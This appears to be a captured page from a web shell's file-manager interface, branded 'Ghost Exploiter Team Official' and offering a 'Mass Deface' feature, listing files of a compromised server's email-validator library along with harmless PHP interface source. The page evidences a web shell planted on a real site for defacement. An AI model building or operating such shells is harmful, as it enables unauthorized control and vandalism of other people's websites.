Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
egulias
/
email-validator
/
src
/
Result
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Reason
--
ren
InvalidEmail.php
0.823KB
edt
ren
MultipleErrors.php
1.041KB
edt
ren
Result.php
0.516KB
edt
ren
SpoofEmail.php
0.299KB
edt
ren
ValidEmail.php
0.37KB
edt
ren
<?php namespace Egulias\EmailValidator\Result; interface Result { /** * Is validation result valid? * */ public function isValid(): bool; /** * Is validation result invalid? * Usually the inverse of isValid() * */ public function isInvalid(): bool; /** * Short description of the result, human readable. * */ public function description(): string; /** * Code for user land to act upon. * */ public function code(): int; }
<=Back
Liking